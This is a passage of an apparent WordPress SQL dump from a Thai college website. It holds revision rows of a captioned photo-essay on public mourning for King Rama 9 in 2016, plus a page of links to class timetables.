บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:15:07', '2018-11-12 07:15:07', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4380, 4, '2018-11-12 14:15:59', '2018-11-12 07:15:59', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 2/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561\r\n\r\n \r\n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\r\nปีการศึกษา 1/2560\r\n\r\nปีการศึกษา 2/2560\r\n\r\n<a href=\"https://drive.google.com/drive/folders/112Qd4zzmPkHhMeDj_tGi4vbUbo3YVPnx?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-11-12 14:15:59', '2018-11-12 07:15:59', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(4381, 3, '2018-11-12 14:16:08', '2018-11-12 07:16:08', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) 